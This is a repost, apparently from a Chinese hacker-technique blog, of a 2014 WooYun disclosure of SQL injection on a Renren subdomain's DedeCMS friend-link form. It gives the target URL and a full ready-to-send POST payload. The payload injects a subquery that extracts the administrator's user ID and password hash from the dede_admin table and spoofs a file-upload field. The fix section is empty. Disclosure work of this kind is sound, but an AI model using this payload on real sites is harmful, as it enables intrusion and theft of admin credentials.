记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

人人网某分站SQL注入漏洞

2014-06-08 02:25

#1.http://www.mhxx.renren.com/plus/flink_add.php

申请一个友情连接,填入验证码抓包,

将Post数据替换为:

Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if(@`'`,0x7c,(select concat(userid,0x7c,pwd) from dede_admin limit 0,1)),1,1,1,1,1)#,@`'`&typeid=1&url=http%3A%2F%2F&validate=HEMS&_FILES[webname][name]=1.gif&_FILES[webname][type]=image/gifx&_FILES[webname][size]=10&&_FILES[webname][tmp_name]=pass\





#2.返回页面审查元素:

19.jpg

漏洞证明:

20.jpg

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2014-058196

阅读:110630 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“人人网某分站SQL注入漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于垒土;黑客之术,始于阅读

推广

工具

标签云

本页关键词